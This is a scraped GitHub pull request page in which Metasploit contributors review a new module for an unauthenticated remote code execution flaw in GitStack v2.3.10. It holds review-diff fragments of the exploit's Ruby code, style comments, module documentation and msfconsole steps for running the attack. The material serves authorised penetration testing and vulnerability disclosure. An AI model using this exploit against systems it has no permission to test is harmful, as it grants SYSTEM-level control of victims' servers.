-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Gitstack v2.3.10 RCE #9670
Gitstack v2.3.10 RCE #9670
Conversation
I need to add references... 🤦♂️ |
'Platform' => 'win', | ||
'Payload' => | ||
{ | ||
'BadChars' => "\x00" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
?
'BadChars' => "\x00" | ||
}, | ||
'Targets' => [['Automatic', {}]], | ||
'Privileged' => true, |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It runs as SYSTEM?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It does run as SYSTEM.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
D:
def check_web | ||
begin | ||
res = send_request_cgi({ | ||
'uri' => normalize_uri('/rest/settings/general/webinterface/'), |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Kinda don't need normalize_uri
if you have a static URI like this.
'uri' => normalize_uri('/rest/settings/general/webinterface/'), | ||
'method' => 'GET' | ||
}) | ||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Rex::ConnectionError
catches a lot of this.
end | ||
if res && res.code == 200 | ||
begin | ||
mylist = JSON.parse(res.body) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
res.get_json_document
?
def create_repo | ||
repo = Rex::Text.rand_text_alpha(5) | ||
c_token = Rex::Text.rand_text_alpha(5) | ||
data = "name=#{repo}&csrfmiddlewaretoken=#{c_token}" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
vars_post
instead.
res = send_request_cgi({ | ||
'uri' => '/rest/settings/general/webinterface/', | ||
'method' => 'PUT', | ||
'encode' => true, |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Is there a reason for this? I don't see anything that needs encoding in the URI?
payload_instance.arch.first, | ||
{ :remove_comspec => true, :encode_final_payload => true } | ||
) | ||
fail_with(Failure::PayloadFailed, "Payload is too big") if command.length > 6110 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Might want to let the user know what this magic number means.
end | ||
|
||
r_users = repo_users(pwn_repo) | ||
unless r_users.nil? || r_users == [] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You can use empty?
. Or even blank?
if you like.
'Privileged' => true, | ||
'DisclosureDate' => 'Jan 15 2018', | ||
'DefaultTarget' => 0)) | ||
register_options([Opt::RPORT(80)]) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Either we want an extra blank line above this, or remove this line if we get RPORT
from the HttpClient
mixin.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I glossed over this. Good change.
return nil | ||
end | ||
|
||
unless mylist.length == 0 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Maybe consider flipping this logic around per the style guide: https://github.com/bbatsov/ruby-style-guide#no-else-with-unless
end | ||
|
||
r_users = repo_users(pwn_repo) | ||
unless r_users.nil? || r_users.empty? |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Same nit as above (https://github.com/bbatsov/ruby-style-guide#no-else-with-unless)
i.e.
if !r_users.blank?
pwn_user = create_user
if pwn_user
mod_user(pwn_repo, pwn_user, 'POST')
run_exploit(pwn_repo, pwn_user, command)
mod_user(pwn_repo, pwn_user, 'DELETE')
delete_user(pwn_user)
end
else
pwn_user = r_users[0]
run_exploit(pwn_repo, pwn_user, command)
end
You could also use if r_users.present?
instead of if !r_users.blank?
, as it's just an inversion of the return value of the .blank? method (but is less common in the Metasploit code; .blank? is more common).
Nice module, @jrobles-r7 ! I'll see if I can get GitStack installed this afternoon for testing... 💯 |
@@ -0,0 +1,61 @@ | |||
## Description | |||
|
|||
This module exploits an unauthenticated remote code execution vulnerability on GitStack v2.3.10. The module will send unauthenticated REST API requests to put the application in a vulnerable state, if needed, before sending a request to trigger the exploit. These configuration changes are undone before the module exits. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
"...vulnerability in GitStack through version v2.3.10" maybe? https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5955
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
My comment was really around the fact that the CVE says that all versions up-to-and-including v2.3.10 are vulnerable. The current verbiage sounds like it's only version v2.3.10 which is vulnerable, which is not the case according to the CVE.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Oh ok. I didn't want to say the "... module exploits... through version v2.3.10" since I didn't test the exploit against earlier versions of GitStack.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It's normal to list vulnerable versions and tested versions, too.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
"Versions X-Z are vulnerable. Tested on version Y." Something like that.
Works for me when targeting my Windows 10 system:
But I dawdled too long, lost my committer rights (womp womp)... So FWIW to others, it worked for me. :) |
Release NotesThe exploits/windows/http/gitstack_rce module has been added to the framework. It exploits an unauthenticated remote code execution vulnerability on GitStack v2.3.10. The module will send unauthenticated REST API requests to put the application in a vulnerable state, if needed, before sending a request to trigger the exploit. These configuration changes are undone before the module exits. You may have to run the exploit more than once to generate a small enough PowerShell. |
This module exploits an unauthenticated remote code execution vulnerability on GitStack v2.3.10. The module will send unauthenticated REST API requests to put the application in a vulnerable state, if needed, before sending a request to trigger the exploit. These configuration changes are undone before the module exits.
Verification
./msfconsole
use exploit/windows/http/gitstack_rce
set rhost <rhost>
set verbose true
run